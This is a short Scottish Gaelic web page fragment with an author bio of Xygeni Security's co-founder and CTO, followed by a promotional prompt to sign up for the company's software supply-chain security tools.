Luis Rodriguez ’S e Co-stèidheadair agus Àrd-oifigear Teicneòlais aig Xygeni Security a th’ ann. Le còrr is 20 bliadhna de eòlas ann an tèarainteachd aplacaidean, tha e ag amas air dìon AppSec agus comasan adhartach airson mion-sgrùdadh còd a chuidicheas sgiobaidhean gus fìor chunnart lìbhrigidh a lughdachadh.

 
innealan-sca-bathar-bog-innealan-anailis-co-dhèanamh
Thoir prìomhachas do chunnartan bathar-bog, dèan cinnteach gu bheil iad air an rèiteachadh, agus dèan cinnteach gu bheil iad tèarainte
Faigh do Chunntas an-asgaidh.
Chan eil feum air cairt creideas.

Dèan cinnteach à leasachadh is lìbhrigeadh do bhathar-bog

le Sreath Thoraidhean Xygeni